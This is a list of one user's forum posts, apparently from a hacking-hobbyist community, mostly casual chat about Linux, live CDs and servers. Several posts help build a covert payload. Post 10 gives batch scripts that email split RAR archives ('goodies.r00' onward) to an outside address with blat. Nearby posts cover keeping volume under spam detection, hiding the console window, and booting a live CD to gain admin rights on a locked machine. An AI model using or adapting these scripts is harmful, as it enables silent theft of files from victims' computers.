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Everything posted by SomeoneE1se

  1. Ya but do you really want to attack us now!? I mean Bush would love to launch a few nukes at someone... and barring that now if we catch you we can torture you... Protests protests where can I find a good one?
  2. I may have to take the day off work to go protest this... at least california is good for somthings... theres alwasy a good protest somewhere
  3. one of the best ways to learn is to dive in head first... I don't know everything about windows but that didn't stop me from burning an live ISO and trying it out... i didn't know anything but I had fun learning and expermenting... and if I did something to screw it up.... restart it's back to normal.... and I think he's smart enough not to delete anything or format anything so he'll be fine...
  4. I would sugest you do nothing.... this could be to update and just preventing down time.. i.e. if you do somthing and the admin comes in to turn on securty and finds you have messed around... bye bye all computer usage... I'd say wait a few days (even a weekend or two to be safe) if it's still like that after then you might want to do somthing LEGAL...
  5. it's been fixed 3 times... however if we start to send more then about 20 e-mails someone is going to catch that if not flagged as a spamer and that being a quick way to get an IP killed so keeping it to less then 100 would be the best idea... when I get home i'll test coopers batch script and edit it if need be
  6. I think this bit of code will create an error becasue if the .rar does not exist when it sees the .r00 it will try to send *.rar and it not being there will gen the error.... spliting the send of .rar and the sending of .r00 should fix this I can't think right now I'm at work
  7. becasue X makes it easy for someone who's new to linux/server comming for a windows system
  8. Or do you? Imagine fish swimming around your cpu, an eel latched to your ram and a starfish chilling with your videocard. Sounds like a cool idea to me. I was going to say that would be the coolest mod i've seen.... I may have to try this when I move into the new house... I can get my friend to help me out he loves fish.
  9. meh is right.... but then we're all spoiled with the best l337n355 that is HAK5
  10. Ok so I finshed my code I didn't go to 45 but sending 20 files should be enough and i also preped boristsr code but I have NO idea if it will work @ECHO OFF IF EXIST goodies.r00 GOTO hak0 ELSE GOTO end :hak0 blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r01 GOTO hak1 ELSE GOTO end :hak1 blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r02 GOTO hak2 ELSE GOTO end :hak2 blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r03 GOTO hak3 ELSE GOTO end :hak3 blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r04 GOTO hak4 ELSE GOTO end :hak4 blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r05 GOTO hak5 ELSE GOTO end :hak5 blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r06 GOTO hak6 ELSE GOTO end :hak6 blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r07 GOTO hak7 ELSE GOTO end :hak7 blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r08 GOTO hak8 ELSE GOTO end :hak8 blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r09 GOTO hak9 ELSE GOTO end :hak9 blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r10 GOTO hak10 ELSE GOTO end :hak10 blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r11 GOTO hak11 ELSE GOTO end :hak11 blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r12 GOTO hak12 ELSE GOTO end :hak12 blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r13 GOTO hak13 ELSE GOTO end :hak13 blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r14 GOTO hak14 ELSE GOTO end :hak14 blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r15 GOTO hak15 ELSE GOTO end :hak15 blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r16 GOTO hak16 ELSE GOTO end :hak16 blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r17 GOTO hak17 ELSE GOTO end :hak17 blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r18 GOTO hak18 ELSE GOTO end :hak18 blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server IF EXIST goodies.r19 GOTO hakover ELSE GOTO end :hakover blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server :end exit if you expect to have to send more then 20 files let me know and i'll update the code for more files and again I have noidea if this will work @echo off SET rarNum=00 SET rar="goodies.r" SET rarfile=%rar%%rarNum% IF NOT EXIST %rarfile% GOTO end :hakit blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server ::increment the file number SET /a rarNum=rarNum+1 IF %rarNum% LSS 10 set rarNum=0%fileNum% SET rarfile=%rar%%rarNum% ::check to see if next file exists and then loop ::else continue on IF EXIST %rarfile% GOTO hakit :end exit
  11. Take a look at fastpush all that is, is just a batch script.... or anyother program.. the idea would be to chose the language to fit the program requirements here we need to pass commands to the windows command line... useing a batch script would be the best/fastest way... if not the simplest or smallest code.... it works thats all we need. and this way theres nothing else trying to hide on the computer...
  12. This is just a simple batch script it's been a long time but its somthing like IF EXIST pwned.r00 GOTO hak1 ELSE GOTO END :hak1 pwn box more send e-mail 2 (replace with script to send e-mail I have no clue about those commands) IF EXIST pwned.r02 GOTO hak2 ELSE GOTO END :hak2 pwn box more (same) IF EXIST pwned.r03 GOTO hak3 ELSE GOTO end ... more haking code ... :end REM THIS BOX HAS BEEN PWNED BY HAK5.ORG someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg) and you may not want to add that last REMark
  13. somewhere on this forum someone kept saying somthing about renaming the bat to somthing like .cmd or command or somthing thats starts with a C and reminds me of the work command and if you do NO window will come up I remember hearing of this twice but I can't seem to find it anymore
  14. i like deepburner free i use to to handed my DVD .iso because the PowerToy i use for other iso's seems to choke on DVDs
  15. .... are you kidding me? 8 + 8 = 16 3 + 3 = 6 making the first 6/16 therefor smaller on the inside and if you cant figure out that 5/8" IS larger then 1/2" then you don't get to know... comeon this is third grade stuff
  16. Happen to look at your logs to see where it came from? it was a free and crappy ftp server I don't think the free version kept logs
  17. ubuntu claims to be good for servers http://www.ubuntu.org I think debian is good but I've never used it for a server http://www.debian.org if you want to play around this might work for you http://slampp.abangadek.com/wiki/HomePage and for the required hak5ness http://www.freenas.org
  18. I'm shocked at all of you... and you call you selfs haklings here's what you do.. if you can burn a CD go find a nice small Live CD the smallest one at http://www.slax.org should work for this.. and reboot into slax and poof you're now an admin... use truecrypt it's the best if you can't burn a cd http://www.ubuntu.com have them send you a cd you can use it as a live CD and poof your admin again... use truecrypt it's l33t
  19. I was hosting a FTP server with anon open to the world (don't ask why.. I know this is such a bad idea but I needed it for a while...) anyways one day when I checked the folder that was open to the world and a certain type of pr0n was sitting there and I read the file name and was quick to pop in a DBAN cd... I have no need/want to be answering question from the FBI
  20. if you have formatted your c: drive, the situation u describe is impossible. impossible is nothing... to begin with if anyone does not believe me, just take the time and make your own conclusions and don't treat me as if I was dumb-stupid, I know what I say. At this point I believe the only way they ARE doing this is by grabbing (somehow with actionscript or maybe a hidden script on another web scripting languaje) some hardware unique id's, like the cpu one or the hard disk one, or maube a combination of both. by the way, I always zero all data when formatting. I DON'T BELIEVE YOU I was bored so I decided to test this out (I needed to format anyway) I made sure I was signed in to pandora in firefox and IE then I formated and reinstalled XP and it did not know who I was when I went back to pandora.. and the Same for Vista (Clean upgrade from 5600 to 5728) so I think you signed in or someone else signed in or you didn't format it at all. and if I wasent so lasy I'd open wireshark and CHECK EVERY packet sent to pandora servers...
  21. I'm guessing it's either from Lewis Black or Fight Club. +1 to mad props I love Lewis Black
  22. LMAO I know the feeling moonlit just let it go becasue you end up dead in your bath tub... (I wonder if anyone will get this rerence)
  23. You could masturbate and use fresh kitten blood
  24. Lol I have and, true, I got a G5, a MacBook, and a old iMac, and none of em have gotten a virus or anythin yet... :ninja:
  25. Someone hasn't seen the new Get a Mac commercials
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